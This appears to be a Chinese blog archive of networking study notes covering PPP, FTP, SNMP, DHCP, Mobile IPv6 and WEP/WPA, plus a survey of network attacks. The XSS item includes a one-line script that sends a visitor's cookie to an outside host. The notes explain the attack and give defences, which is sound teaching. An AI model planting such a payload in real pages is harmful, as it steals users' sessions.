顯示具有 network 標籤的文章。 顯示所有文章
顯示具有 network 標籤的文章。 顯示所有文章

8月 28, 2013

TOTOLINK N100RE 與 TP-Link TL-WN722N 的組合

家用網通設備也好便宜。一台無線分享器只賣399元,一支USB無線網卡只要369元,整組加起來還不到一千元。
  • 無線路由器:TOTOLINK N100RE
  • 無線USB網卡:TP-Link TL-WN722N
所有設備安裝妥當後...竟然不能上網!來來回回弄了一小時,心裡一直想著:
「果真便宜沒好貨,明天拿去換組新的」
最後決定看一下官方的線上文件。天呀!怎麼會被那麼低級的錯誤俵到。

住處使用 DHCP 上網,電信公司的 ONU 設備本身就是:192.168.1.1。新買回來的無線路由器(TOTOLINK N100RE) 預設也是同個 IP,難怪一直沒辦法取得網路位址。

真的可以撞牆了,連這都忘了。

7月 12, 2011

PPP 協定 (Point to Point Protocol)

一般廣域網路的網路協定第二層封裝協定有以下幾個種類:
HDLC 、PPP 、SLIP 、X.25、Frame Relay 及ATM,所以PPP 協定正是其中一種普遍被使用的廣域網路協定。用於兩個網路節點的直接連接。例如兩台電腦透過電話線的網路連接。

1. Data Link Layer 協定

2. 以位元組為單位(Byte Oriented)的通訊

3. 使用哨兵法 FLAG 0x7E 標出 frame 的起終

4. 使用LCP(Link Control Protocol)來負責底層線路控制與連接。
LCP 是PPP 協定中最重要的部分。LCP 的主要工作是建立PPP 協定
的連線以及與連線相關的工作:認證、壓縮、錯誤偵測。

連線建立階段會發送LCP 協定的網路封包,以便設定和測試網路連線。

5. 使用NCP(Network Control Protocol )來負責上層資料的封裝過程。

5月 27, 2011

DSSS FHSS OFDM

DSSS 直接序列展頻技術 (Direct Sequence Spread Spectrum)

利用展頻碼(Spreading Code) 將原始訊號展開成數倍頻寬的訊號,
這個展開的方法會將原來訊號的能量降低。

IEEE 802.11 DSSS 使用 11bits chipe sequence
利用10個以上的chips代表「1」或「0」位,將原本高功率、窄頻寬的位元訊號,
利用10個以上的chips代表「1」或「0」位,將原本高功率、窄頻寬的位元訊號,
透過虛擬隨機序列(Pseudo Random Sequence)和相位移轉技術(PSK),轉變成
低功率、寬頻帶(在2.4Ghz頻帶,分以13個頻道,每個頻道頻寬為5MHz)的載波
訊號,這些轉變後的載波訊號被稱為 Spreading Chips,Chips數愈多可以增加
資料安全性,愈低則增加使用者數目。普遍使用 10-20 Chips。

信號擴展在很寬的頻帶上,單位帶寬上的功率很小,即信號功率譜密度很低,
信號淹沒在Noise之中,別人難以發現信號的存在。

優點:抗干擾能力佳、資料隱密性、防竊聽
缺點:耗電較 FHSS 多一倍、區域內只能允許三部AP同時運作

FHSS

將可用頻帶切割成多個狹窄的 channel,發送者會在各頻道中跳躍,送出資料。
接收端要以當初約定好的跳躍樣式(Pattern) 去各相對頻道接收訊息。
使用 FHSS 可以達到安全性,適合短距離、速度要求度不高的網路使用。

優點:抗干擾能力強、允許較多系統同時運作
缺點:傳送速率慢

OFDM
優點:高傳送速率、抗信號衰減、免於多重路徑傳輸干擾
缺點:涵蓋範圍小、時鐘信號的不匹配較敏感

4月 02, 2011

FTP 協定介紹

FTP 的連線模式分兩種:主動模式(Active mode) 與 被動模式(Passive mode)

[主動模式] Client 這邊開個 port 之後 Server 要主動連過來

Client 與 Server 連線後,Client 會主動利用 PORT 這個指令來告訴
Server ,未來 Data Channel 請你連線到我這個 port 這邊

指令: PORT 69,171,224,13,17,35 (17*256+35=4387)
回應: 200 Port command successful.

在這邊,Client 告訴 Server:
將來若是你有資料(像是檔案列表)要送給我,那麼就送 port: 17*256 + 35 這邊。所以 Server 會主動利用 Server 主機的 Port 20 發出連線到 FTP Client 的主機

C:4386 ----myPort:17*256+35----> S:21
C:4387 <--真正有 Data 要送來---- S:20

[被動模式] 因為 Client 在防火牆內,所以 Server 只能被動等他連過來

如果 Client 在防火牆或者 NAT 下面,那麼Server 的主動連線就會被擋掉
此時就要採用 Passive 被動連線方式:麻煩 Server 額外開一個 port 之後我會連過去

指令: PASV
回應: 227 Entering Passive Mode (173,221,21,38,32,89)

C:X ----你開個 Port 給我,之後會連過去 ----> S:21
C:X <---我會開個 port 在 32*256+89等你 ----- S:21
C:Y ----主動送出 SYN 連線請求--------------> S:8281


note:
(1) 不要再被 port 20 與 21 搞混了,這兩個 port 是 Server 在主動模式用的
(2) 如果是在被動模式下,除了 Server port 21 是確定的之外其他的 port 都是動態指定,並沒有固定要在哪個位置

3月 28, 2011

SNMP

http://goo.gl/we63e SNMP
http://goo.gl/XJw52 MIB

SNMP (Simple Network Management Protocol)

使用 UDP 161 :request/response mode 單純資料查詢
使用 UDP 162 :trap mode 有例外狀況發生時,進行緊急通報

屬於應用層的協定,在 SNMP Ver.2 之前,把網路節點分為 Manager 與 Agent。
因為 SNMP 屬於 Application 層應用,所以實際在運作上,不用考慮網路實體層
所用的架構。

- Manager: 使用 SNMP 協定的主機,用來管理 Agent
- Agent: 可能是一台路由器或者網路設備。

SNMP 的主要功能:

1. 組態管理:系統設定,資料蒐集
2. 故障管理:網路異常時,進行檢測與除錯
3. 效能管理:用來收集運作報告
4. 帳務管理:統計各項資源的使用時間

MIB (Management Information Base)

存放網路元件的狀態資訊,網管架構的核心。用來記錄網路設備的屬性
與功能。不管是網路上的硬體或軟體,都是以物件來加以表示,而物件
的規則、定義與語法是由 SMI 來指定結構與描述資料物件的方法。
在 MIB 中要包括:物件名稱、讀寫權限、型別、物件識別(OID)

SMI (Structure of Management Information)

用以定義 MIB 資料庫中各項欄位之屬性,規範每個網管物件的型別,
可接受的容容值。用來完整描述網管資訊的語法。常見的型別有:
INTEGER、OCTET STRING、OBJECT IDENTIFIED (OID)、IPaddress

數位信封 Digital Envelope

數位信封 Digital Envelope

發送端產生 對稱金鑰 (Symmetric Key),使用對稱金鑰來加密信件內容:

(信件內容) ---Symmetric Key---> (信件密文)

之後再把這個 對稱金鑰 用 收件者的 Public Key 加密起來:

(Symmetric Key) ---收件者 Public Key---> (對稱鑰的密文)

所以送出的資料包含了:
(信件密文,由對稱鑰加密過)+(由公鑰保護的Symmetric Key)

跟 PGP(Pretty Good Privacy) 相比,數位信封少了簽章的動作,所以沒辦法確實證明信件是由 A 發送的。

3月 27, 2011

IDS IPS 入侵偵測 防禦系統

[ IDS ]

入侵偵測(IDS)系統主要功能在負責監聽網路封包,依據預先設定的安全策略
(Security Policy),對網路與系統的運行狀況進行監測,當發現異常,自動
發出警訊通報給網管人員

傳統的 IDS 最被詬病之處乃是其僅能產生大量的警報事件,無法立即阻絕入侵攻擊。而且因為受限於有限檢測技術及旁聽式(Sniffer Mode)部署模式,產生誤報比率較高。

IDS 分為兩類:
NIDS(Network Intrusion Detection System)
HIDS(Host based Intrusion Detection System)

1. NIDS:
分析從網路收集來的封包,查看封包特徵與資料庫進行比對,收集相關資訊並記入日誌
2. HIDS:
安裝在被檢測的主機之上,即時對網路進行系統「日誌檢查」,進行智慧分析和判斷。

[ IPS ]

入侵防護(IPS)系統則化被動為主動,當發現網路異常封包或行為時,系統除發送警訊通報給網管人員,並立即採取必要的處置措施,例如阻斷來源IP。從保護對象上可將IPS分為三類:

1. 主機的入侵防護(HIPS)
用於保護伺服器和主機系統不受不法分子的攻擊和誤操作的破壞。
2. 網路的入侵防護(NIPS)
檢測網路流量,提供網路系統的安全保護,若有入侵行為,NIPS就阻斷該連線。
3. 應用程式入侵防護(AIPS)
是將基於主機的入侵防護擴展成為位於應用伺服器之前的網路資訊安全設備。

3月 26, 2011

switch 交換封包的方式

Switch 交換封包的方式分成三種:

Cut through , Store and forward , Fragment free

[ Cut through ]

Cut through 英文意思:抄近路
當 switch 在收到封包時,會去讀取 Destination MAC 位址,並在 MAC table 中找詢相對應的 port 然後把封包遞送出去。這樣的作法的好處,速度快延遲(latency)低;但缺點是,封包在 CRC 檢查前,就會直接送出了,這樣一來即使封包有問題,仍是在網路上傳送。

[ Store and forward ]

封包會整個進入 switch 後,檢查正確性,再行送出

[ Fragment Free ]

Fragment Free 由 Cut through 改良而來,它具有檢查碼框是否碰撞與部份的誤碼偵測能力。延遲時間 比 Cut-through 稍 長 。(Cisco採用的技巧)

網路攻擊 (Network Attacks)

1.Ping of Death:
ICMP Echo Request/Reply的封包格式包括Option Data這一部分,雖然其內容可有可無,但是當Echo Request包含此部分資料時,接收端必須將這些資料原封不動的包含在Echo Reply中回送給發送端,雖然沒有明定封包的大小,但是小於65535 bytes的封包才算合法。

只要刻意地將Echo Request的Option Data塞入大量資料,便可以造出超過65535 bytes的TCP/IP封包,當它送入被攻擊端的電腦時,由於作業系統本身無法處理這種變形封包,因此會造成當機的狀況。

2. Smurf攻擊:
TCP/IP對網路定址的定義中,有一個位址是用來廣播此網段上全部電腦,這就是我們所稱的廣播(broadcast)位址,定義為將子網路的bit全部設為1。所有連接此網路的網路卡都會將此封包接收進主機中,對此封包進行回應或處理。

攻擊者會先假冒目標主機(受害者)之名向中介者(router)發出broadcast的ICMP Echo Request封包,因為是目的地是廣播位址,中介者在收到之後會對該區域網段內的所有電腦發出此ICMP封包,而所有的電腦在接收到此訊息之後,會對來源主機(亦即被假冒的攻擊目標)送出ICMP Echo Reply回應,所有的ICMP封包在極短的時間內湧入目標主機內,不但造成網路壅塞,更會使目標主機因為無法反應如此多的系統中斷(interrupt)而導致當機、暫停服務

3. Teardrop
4. TCP SYN flood
5. UDP flood

6. Session Hijack
入侵者在正常用戶登入主機並完成身份確認後,即進行連線截奪,讓合法使用者跟主機間的連線中斷,入侵者的電腦取代合法使用者與遠端主機進行連結,入侵者可存取使用原合法使用者所有有權限存取的任何資源

7. 跨網站攻擊程式(XSS, Cross-site scripting)
針對網站應用程式設計不夠嚴謹,攻擊者在網頁中塞入惡意語法,雖然表面上可能如同正常頁面運作,但在背後可以藉機取得用戶的資料。嚴重者可以透過 cookies 擷取,讓能夠讓攻擊者,取得網站管理權限。

例子1

<a href="/usercp.php?action=logout">一個關於貓的網頁</a>

當 其他人點選連結,他們以為會看到一個關於貓的網頁,卻會因此登出這個網站。

例子2

<script>
location.replace('http://rickspage.com/?secret='+document.cookie) </script>


當 Joe 瀏覽留言板時,他就會被引導到 Rick的網站。
而且連線資訊 cookie 當作網址的一部分,傳遞到 Rick 的網頁伺服器。
Rick 接著就可以透過這個來自 Joe 瀏覽器的 cookie 以 Joe 的帳號瀏覽 Joe 的網站

[ 防治 ]
避免XSS的方法主要是將使用者所提供的內容進行過濾

8. SQL injection
稱為 SQL 指令植入式攻擊,只要提供使用者輸入介面,又沒有做到安全的輸入資料型態
管制,就有可能會遭受這種行為的攻擊。

[ SQL帳號設定 ]
設定一般使用者權限,攻擊者只能掌控被攻陷的那個使用者的資料庫
最差狀況下, 攻擊者也只能夠閱讀或寫入被攻陷的那個使用者的表格

[ 網頁程式撰寫 ]
過濾輸入條件中可能隱含的sql指令,如 INSERT、SELECT、UPDATE 等
針對特殊的查詢參數進行過濾,如--、 ' 等

[ 網站伺服器方面 ]
定期修補作業系統與網站伺服器的漏洞

3月 22, 2011

DHCP 協定

DHCP (Dynamic Host Configuration Protocol)
功能:動態的分配 IP 位址、指定 TCP/IP 的其它參數

[ DHCP 角色 ]

1. DHCP Client:發 DHCP request 取得 IP
2. DHCP Server:收到請求,提供可用 IP
3. Scope:可以用的 IP (想成 IP pool)

[ DHCP 運作原理 ] ... 以下流程全是以廣播完成 (因尚未取得 IP)

1. client 廣播送出 DHCP discovery
2. server 廣播回答 DHCP offer
3. client 收到 offer 後會決定是否採用該 IP (通常 client 會收到很多 offer)
4. client 決定使用之後會廣播 DHCP request 通知 server (順便也通知其他人落選)
5. server 在收到 request 之後,會用 DHCP ACK 來最終確定,如果該 IP 提前
被其他主機搶用,則 server 會回應 NACK

[ DHCP 租約更新 ]

使用 DHCP request 以 unicast 的方式通知 server
當租約超過 1/2 時會進行 Renewal
當租約超過 7/8 時會進行 Rebinding

[ DHCP relay agent ]

如果 DHCP server 與 client 是在不同網段,就要使用到 relay agent
DHCP client <--broadcast--> relay agent <--unicast--> DHCP server

或者 router 願意做 DHCP forwarding,不會把封包擋下來:
client -> Router(DHCP Fw) -> server

[ DHCP snooping ]

為了加強 DHCP 機制,在 switch 上加入功能,當 DHCP server 核發 IP 時
switch 會去確保這個 IP 是由當初提 request 的 client 所使用,
即 IP/MAC 的對應要正確。

1. 記憶主機的 MAC 位址
2. 只允許特色的 DHCP server 被存取
3. 主機只能使用核發的 IP 而不可任意使用其他 IP

**

[ BOOTP ]

Bootstrap Protocol

架構在 UDP/IP 之上的協定,允許一台無磁碟主機,透過網路送出請求,
藉由自己的 MAC 位置查詢對應 IP,並得到開機印象檔(boot file) 進行開機。

RARP 只能在 LAN 裡面運作,而 BOOTP 可以經由 Router 轉送。
BOOTP 使用的 port Server:UDP67 , Client:UDP68

3月 21, 2011

多媒體網路 (Multimedia Networking)

[ 關於多媒體網路 ]

網路中的多媒體有以下幾個特徵:

1.對於延遲(delay)較敏感
2.可以容忍資料遺失(loss tolerant)
3.資料具有連續性(continuous data)

(補充) QoS 考量因素:Reliability, Delay, Jitter, Bandwidth
對多媒體資料來說,可靠度(Reliability)並非主要訴求,因為影音
在播放時可以忍受部份片段的遺失。

[ 多媒體應用程式的分類 ]

1.串流儲存式(streaming stored)的audio和video
先從網路下載多媒體檔案再播放。
由使用者端去要求播放,事先儲存在伺服器端的多媒體檔案並透過網路傳送。
使用者可控制多媒體檔案的播放(play, pause, backward, forward)

2.串流即時式(streaming live)的audio和video
直接透過網路播放多媒體檔案

3.即時交談式(real-time interactive)video
- Unidirectional real-time
因為是即時播放,使用者不能控制多媒體播放,只能聽和看,像是TV、收音機。
- Interactive real-time
交談式所以所造成的延遲會增加

[ 如何應用現在的網路傳送多媒體 ]

Jitter:在同一個多媒體串流中的封包的延遲變化程度
現在所使用的Internet是使用best effort,沒有辦法對於 delay 提供保證
使用UDP來傳送
封包加上時間標籤以利播放
協定必須要可以保留頻寬
改變router上scheduling policies

[ Streaming stored media ]
Audio和vedio檔案儲存在伺服器裡
檔案會在使用者請求後10秒後送出
允許多媒體檔的播放,依照控制暫停、倒轉、前進
Media Player 的角色:移除 jitter、解壓縮多媒體檔案、錯誤更正

[ RTSP ] Real Time Streaming Protocol

1. 負責的是 streams的控制,控制一到數個 audio 或 video
2. 傳輸時所用的 protocol 或 mechanism 不在它定義的範圍內
3. 網路當中我們大多使用RTSP來當作傳送控制訊號
4. 每一個RTSP都有一個session的識別號 (在 SETUP 時取得識別號)
5. RTSP 的語法與 HTTP 相類似
6. RTSP 支援 multicast 可用來作 video conference
7. RTSP 有一個 redirect 的指令,可以拿來達到 load balance
8. RTSP 要記錄每個連線的 state 但是 HTTP 是 stateless 的

[ RTSP 的運作 ]

Presentation description: 用來描述與 sessioin 有關的資訊,
例如檔案位置、格式及使用的編碼,這些資訊是用一個叫做
SDP (Session Description Protocol) 來表示,這是一個純文字

1. client 與 web server 用 HTTP 溝通,server 會告知 RTSP 資訊
2. client 從 web server 收到 RTSP 的位址後,準備向 RTSP server 進行連線
3. client 向 rtsp server 要求該 stream 的資訊(DESCRIBE)
4. rtsp server 會回答 stream 相關訊息
(以 SDP 格式呈現→這就是 Presentation description )
5. 在收到這些訊息後 client 就會進行 SETUP PLAY 等 stream 的操作。

SDP 為單純文字內容的協定,使用者必需先將 *.sdp 的 MIME type 設定好,
如此一來,就能透過外部程式,對 SDP file 中指定的 session 做處理。

格式例如:
v=0 ... protocol version
u=http://www.cs.mit.edu/Handy/sdp.03.ps ... URI of description
m=audio 3456 RTP/AVP 0 ... 資料中有 audio data ; port 是 3456

[ Real-time interactive applications ]
1. 例子:Web cams、視訊、網路電話
2. 要考慮到的問題:Packet loss、Delay jitter
Packet loss : 使用 UDP 封包不宜用 TCP 封包。
Jitter: 移除 jitter 的方法,使用 timestamp 與 delay playout
每個送出的 pkt 加上 timestamp(t) 並使用一個固定 delay(d)
接收端在收到 pkt 時會在 time= t+d 時播放,如果超出時間則直接 drop

[ RTP ] Real-time Transport Protocol

1. RTP為了封包攜帶audio和video有定義封包的結構
2. 格式:封包攜帶的資料格式識別、封包序號編號、時間標記
3. RTP 封裝在 UDP 內
4. RTP並沒有提供適時的資料傳送和任何麼品質服務保證
必須使用類似RSVP這樣可以預先保留頻寬的機制

[ RTCP ] Real-Time Control Protocol

RTCP 協議的主要功能是:服務品質的監視與回饋、媒體間的同步,以及多播組中
成員的標識。RTCP 分組週期性地在網上傳送,它帶有發送端和接收端對服務品質
的統計資訊報告。

1. 與 RTP 一同使用:
RTP Port number = 偶數
RTCP Port number = RTP port +1

2. RTCP 封裝發送端和/或者接收端的統計報表

2. RTP 中的 session 會用 RTCP 溝通,
傳遞有多少個封包被傳送、多少封包遺失、jitter變化

4. RTCP可以用來同步在同一個RTP session裡的多媒體串流
例如:視訊會議裡包含影像和聲音

[ H.323 ]
1. 為了在傳送多媒體資料所設計的協定,應用實例:Microsoft Net meeting
2. 定義了:
(a) 端點的機器如何撥接一個呼叫
(b) Audio和video如何同步
(c) Audio和video如何封裝以透過網路傳送
(d) 網路電話和一般PSTN/ISDN的電話如何溝通

3月 16, 2011

Mobile IPV4/IPV6

Mobile IP

Mobile Node (MN) 行動節點
一個移動到外地網路還能繼續使用本地位址的主機或路由器。

Home Agent (HA) 本地代理器
通常是路由器擔任,主要將其他主機送給外地的MN的封包透過隧道
技術(Tunnel)傳送給MN,並記錄定址的資訊。

Foreign Agent (FA) 外地代理器
通常是路由器擔任,當MN拜訪此外地網路,提供註冊和隧道技術(Tunnel),
並將封包轉送給MN。

Agent Advertisement 代理器宣告
Router Advertisement message 的延伸功能,用於告知MN目前所在的網路代理器等資訊。

Care-of Address (CoA) 臨時位址
當MN離開本地網路後,透過隧道技術傳送到的終點端位址。
在Mobile IP協定中使用兩種性質的Care-of Address:

Foreign Agent Care-of Address (FACoA)
由FA的Agent Advertisement所提供的CoA。

Co-located Care-of Address (CCoA)
MN 在外地網路中,事先取得或透過DHCP取得的CoA。

Home Address (HoA) 本地位址
MN在本地網路內所分配使用的網路位址。

Tunnel 隧道技術

將原始資料封包包裝後傳送到另一個節點,接收節點再進行解開包裝的
動作還原原始資料封包。

Forward Tunnel:由HA使用隧道技術將資料送給FA。
Reverse Tunnel:由FA或MN使用隧道技術將資料回傳給HA。

Mobile IP基本動作

MN透過三個階段與CN建立資料傳輸,順序分別為:發現代理器(Agent Discovery)、
註冊(Registration)、資料傳輸(Data Transfer)。

發現代理器

當FA定時提供代理器宣告(Agent Advertisement)的廣播資訊到該網路上,
MN可以把該FA的CoA放進註冊訊息中。代理器宣告訊息是附加在路由器宣告
(Router Advertisement)訊息欄位後面

如果MN未收到代理器宣告的廣播資訊時,可以主動發出代理器詢問(Agent Solicitation)
向FA進行查詢動作。

註冊程序

Mobile IP定義兩種註冊程序,一種是MN透過FA向HA註冊,另一種是MN直接向HA註冊,
依照下列規則決定使用何種註冊程序。

1. 如果MN使用 FA 發行的 CoA進行註冊,必需透過FA轉送。
2. 如果MN使用CCoA且有收到代理器宣告,可以透過FA或其他FA轉送。
3. 如果MN自行取得CCoA,必需直接跟HA註冊。
4. 如果MN回到本地網路,必需直接跟HA取消註冊。

兩種程序都透過註冊要求(Registration Request)和註冊回應(Registration Reply)
的訊息交換達成。


資料傳輸

方法 A) MN透過FA與CN進行資料傳輸

1. 從CN到HA:CN要送資料給MN-HoA,HA可以利用Proxy ARP攔截要送給MN-HoA的封包。
2. 從HA到FA:攔截後,利用Tunnel技術將資料轉送給FA。
3. 從FA到MN:FA解開Tunnel資料後轉送給MN。
4. 從MN到CN:直接使用MN-HoA當來源位址傳送給CN。必需注意的是非所有網路環境允許
這樣的傳送方式(避免偽造封包攻擊行為)。
若不允許時,需要有步驟5、6,將資料轉送給FA。
5. 從FA到HA:利用Tunnel技術將資料轉送給HA。
6. 從HA到CN:HA解開Tunnel資料後轉送給CN。


方法 B) MN直接與CN進行資料傳輸

1. 從CN到HA:CN要送資料給MN-HoA,HA可以利用Proxy ARP攔截要送給MN-HoA的封包。
2. 從HA到MN:攔截後,利用Tunnel技術將資料轉送給MN。
3. 從MN到CN:直接使用MN-HoA當來源位址傳送給CN。必需注意的是非所有網路環境允許
這樣的傳送方式(避免偽造封包攻擊行為)。
若不允許時,需要有步驟4,將資料轉送給HA。
4. 從HA到CN:HA解開Tunnel資料後轉送給CN。


Mobile IP效率不好的問題

1. 雙倍繞送
當CN和MN是在同一個外地網路時,但CN還是必需將資料送到HA,再轉送給FA或MN。這個封包在網際網路上跑來回兩次

2. 三角繞送
一般情況為CN和MN所在網路不同,CN要送封包給MN需要經過HA再轉送給MN,封包需要經過類似三角形的路徑,稱為三角繞送。


Mobile IPv6

為了因應IPv6的新特性,IETF組織定出Mobile IPv6協定,採用IPv6 Extension Header 處理方式,增加Mobile IPv6 在Router上路由的效率,捨棄Mobile IP的Foreign Agent傳輸和認證方式,改為支援路由最佳化讓MN與CN資料傳輸更有效率。

當與CN建立通訊前,MN必需先與HA建立IPSec安全連線,再與CN進行回歸路由能力程序 (Return Routability Procedure)的檢查機制,CN確認MN為正確的接收端後,即可與MN-CoA啟用路由最佳化資料傳輸方式,如果MN移動到其他外地網路時,MN將發送連結更新給CN,請求CN更換為最新的MN-CoA位址。

在 Mobile IPV6 中的新名詞:

Binding 連結
對 MN 來說,會同時使用 HoA 與 CoA(也就是說 HoA/CoA 是綁在一塊)
當 HA 收到封包,會知道該送往哪個 CoA。如果 Mobile Node 移到新的外地網路,會得到新的 CoA ,當然也要進行 re-binding 的動作。

Binding Update List (BUL) 連結更新列表
MN必需記錄與那些CN有建立Mobile IPv6的連結,還有記錄HA資訊,
當MN變更CoA後,依照連結更新列表通知所有的CN和HA。

Binding Update (BU) 連結更新 / Binding Acknowledgement (BA) 連結同意
當MN變更CoA後,使用BU通知HA更新資訊。若MN與CN建立路由最佳化時,
也使用BU通知CN更新資訊。 當HA或CN收到MN傳來的BU,同意更新則回傳BA。

Return Routability Procedure 回歸路由能力程序
這是一個路徑最佳化的程序,當一個 CN 想要傳資料給 MN 時
傳統的路徑是 CN --> HA --> MN ,而 Mobile IPV6 想要改良,
希望直接簡化 CN ---------> MN

當然我們要確認 MN 的身份,否則 CN 可能是把資料傳給了一個偽MN
所以這就是一個驗證身份的程序,流程圖示意如下:
       (IPSec 加密)
[MN] [HA] [CN]
| |
| HoTI HoTI |
|------------------------>|------------------->|
| CoTI |
|--------------------------------------------->|
| HoT HoT |
|<------------------------|<-------------------|
| CoT |
|<---------------------------------------------|

MN 發送Home Test Init (HoTI)經IPSec到HA,HA 解開封裝後傳給CN
MN 也會直接發送 Care-of Test Init (CoTI) 到CN

CN 收到兩個封包後會回應 Care-of Test (CoT) 與 Home Test(HoT)
其中 HoT 是會經過 HA 再用 IPSec 通道送回來。

簡單說,整個流程就是:(自己送)+(透過 HA 轉送)


Mobile IPv6基本動作

Mobile IPv6基本動作分為取得當地網路的Care-of Address、尋找及註冊Home Agent、使用MN與HA的Tunnel傳輸方式、使用MN與CN的路由最佳化傳輸方式。

取得Care-of Address
當 MN 離開本地網路,在外地網路透過IPv6 Stateless Address Autoconfiguration (無狀態位址自動設定)或使用IPv6 Stateful Address Autoconfiguration (狀態位址自動設定,即 DHCPv6)

尋找及註冊Home Agent
當MN取得CoA後,MN利用連結更新 (BU)向HA提出HoA和CoA的對應關係動作,HA回覆Binding Acknowledgement (BA)代表設定成功,
MN不一定要知道HA的IP Address,可以透過Mobile IPv6支援的 Dynamic Home Agent Address Discovery (DHAAD),就可以找到本地網路的HA

使用MN與HA的Tunnel傳輸方式

Mobile IPv6提供兩種MN和CN之間的資料傳輸方式:

第一種方式
如果CN不支援Mobile IPv6,可以使用雙向隧道技術(Bidirectional Tunneling),CN將封包傳送到本地網路內,由HA攔截後使用Tunnel技術傳送給MN,當MN回應封包時,將封包使用Tunnel技術傳送給HA,再由HA使用傳統的Routing方式傳給CN

第二種方式,
當CN支援Mobile IPv6的路由最佳化時,MN可以透過 Return Routability Procedure (回歸路由能力程序)和CN取得確認後,發送連結更新 (BU)給CN,再由CN回應Binding Acknowledgement (BA)達成路由最佳化協議。

若MN要傳資料給CN,將HoA填入Mobile IPv6新定義的Home Address Option Header內,封包的來源位址用MN的CoA,再傳送出去。若CN要回傳資料給MN,將MN的HoA 填入Mobile IPv6新定義的Type 2 Routing Header,封包的目的位址用MN的CoA,就可以傳送給MN。


CN HA MN
|<------------------->| Return Routability Procedure : 驗證程序
| |
|<--------------------| Binding Update (BU) : 我的 CoA 是 xxx
|-------------------->| Binding ACK (BA) : 好的 我知道了
| |
|<------------------->| Routing Optimization 可以直接 CN/MN 對傳了


Mobile IPV6 重點整理

1. 省掉 FA 這個元件,不再使用 FA 協助轉傳封包,路由有效率。
2. 使用 IPSec 加強 HA-MN 之間的通訊。
3. CoA 的方式,在 IPV6 中用無狀態位址自動設定 或者 DHCPV6
在原本 V4 中要透過 FA 或者 DHCPV4
4. 在 IPV4 中 HA 需要處理路由最佳化,在 IPV6 中不需要。

Anycast 任播

In Internet Protocol Version 6 (IPv6), anycast is communication
between a single sender and the nearest of several receivers in
a group. The term exists in contradistinction to multicast,
communication between a single sender and multiple receivers, and unicast, communication between a single sender and a single receiver in a network.

在 IPV6 的 Anycast 功能可以讓單一來源點,送給某個特定群體中「最近的一點」主要功能是用來進行路由表更新,概念是:

使用 Anycast 會送給某個群組中「最近」的一點,這個站台視為一個初始點,初始點會把收到的資訊,再以 Anycast 的方式,傳給同群組內的其中一台,就這樣逐一傳遞,讓大家的路由表都更新

Anycasting is designed to let one host initiate the efficient updating of router tables for a group of hosts. IPv6 can determine which gateway host is closest and sends the packets to that host as though it were a unicast communication. In turn, that host can anycast to another host in the group until all routing tables are updated.

3月 13, 2011

語意網 (Semantic Web)

Semantic Web 有的人會稱為 web 3.0

主要是希望使用一組標準的 web 描述語言,包括 RDF, RDF Schema, OWL 來描述 web 的內容,讓這些內容使電腦也能瞭解,解讀,並可自動搜尋、分享與整合各網頁資訊。

因為在傳統的 web 頁面是給看的,而 html 呈現的只是版面的編排,對電腦來說是不瞭解這些內容的意涵,所以 Semantic web 是希望透過標準的描述工具,讓電腦也有能力瞭解網頁內容。

3月 08, 2011

WEP WPA

WPA - WiFi Protected Access
WEP - Wired Equivalent Privacy

無線網路的環境,透過WEP加密傳送封包時只有MAC nAddress與IV欄位是明碼,其餘部分都會經由RC4編碼加密來傳送。

RC4為一種對稱式的金鑰加密方法,也就是在加密的兩端之間(WLAN Client與Access Point)都要維持一個相同的Key,共同用這把Key來加解密。

資料傳輸時,WEP Key是不變的,唯一會改變的就是24 bits長度的IV值,根據不同廠商實做的方式,IV值可以隨著每個封包的傳送而改變,也可以維持一定的週期不重複。

有鑑於此,IEEE 802.11i針對無線網路原本所具備的弱點加以補強,但由於IEEE 802.11i的標準尚未制訂完成,在WIFI的推動下,制訂了 "WIFI
Protected Access" 標準,目前802.11i主要定義的加密機制可以分為TKIP(Temporal Key Integrity Protocol) 與AES,其中TKIP就是目前WPA 1.x (WPA/SSN)主要採用的加密機制。

TKIP主要的設計是相容於原本802.11的硬體產品,透過韌體與軟體升級來提高加密的安全,一樣是透過RC4加密,但是可以讓每個封包都提供不同的加密Key值。原本的WEP加密使用24-bit的IV值,目前的TKIP使用48-bit IV值。如此大幅減低IV值重複的問題。

WPA的設計中要用到一個 802.1X 認證伺服器來散佈不同的鑰匙給各個用戶;不過它也可以用在較不保險的 "pre-shared key" (PSK) 模式,讓每個用戶都用同一個密語使用pre-shared key的版本叫做WPA個人版或WPA2 個人版,用802.1X認證的版本叫做WPA 企業版或WPA2 企業版。

1月 30, 2011

Virtual Circuit 虛擬線路

Packet-switched Network

分封交換是網路上資料傳遞的一種技術,資料在傳遞之前,先將要傳送的
資料分為數個大小相等的區塊,加上某些檔頭資訊之後,透過不特定的路
徑在網路中傳遞, 利用這種技術包括封包大小固定的非同步傳輸模式(ATM),
以及封包長度可變動的碼框接替(Frame Relay),X.25等協定。

分封交換技術是利用改良電路交換(Circuit-Switched Network)及訊息交換
(Message-Switched Network)技術而來,其傳輸的方法是利用定址封包
(addressed packet)的技術,將欲傳送的資料分割成數個特定長度的資料封包,然後再將封包個別傳送至網路上的分封交換裝置(Packet Switch Element;PSE),每一個封包備至時儲存或複製,每一個封包中均包含了傳送方向的資料,因此封包可送至下一個PSE,並傳回訊息,此時,上一個PSE,就可以刪除剛才複製的封包,依此類推,最後再由分封交換裝置將這些封包
重新組合後,再傳送給接收端的使用者。

封包控制方式
資料以分封交換方式來傳送時,系統可以採用以下兩種方式之一來控制封包傳送:
1. Datagram(資料元)
2. Virtual circuit(虛擬電路)
Datagram(資料元)
使用Datagram來做控制封包時,每個封包均獨立的傳送,由於封包中均有編號,因此,最後只要再由PSE來作結合,便可送至接收端,其封包傳遞路徑並非固定。

Virtual circuit(虛擬電路)
使用Virtual circuit時,和電路交換網路類似,必須先建立一條電路通道但是,和電路交換網路最大的不同在於,Virtual circuit在建立電路通道時,
只會佔用某條路徑頻寬的一部分,剩餘頻寬部分,仍可提供給其他使用者來使用,並非像電路交換網路是完全佔用通道的

1. Datagram其封包傳遞路徑並非唯一,因此,所經過的各個節點都必須執行傳送路徑選擇的工作。反觀Virtual circuit。其事先就建立好傳送的路徑,因此,各個節點不必都執行路徑選擇的工作。事實上,選擇路徑的工作是很佔時間的,因此,若是要傳送大量資料時,最好採用Virtual circuit的方式

2. 以可靠性而言,若網路上每個節點突然故障,Datagram由逾期傳送路徑不是唯一的,可以另外找路徑來傳送資料,但Virtual circuit則因路徑是固定的,所以可能較易受到影響而無法正常傳送資料

Packet-Switch Network優缺點

[優點]
1. 不需要建立線路的時間 (因為是 connectionless)
2. 訊息有錯誤時,只要重傳錯誤的部份即可
3. 實體線路可讓多個傳輸工作共用,故線路的利用率較高
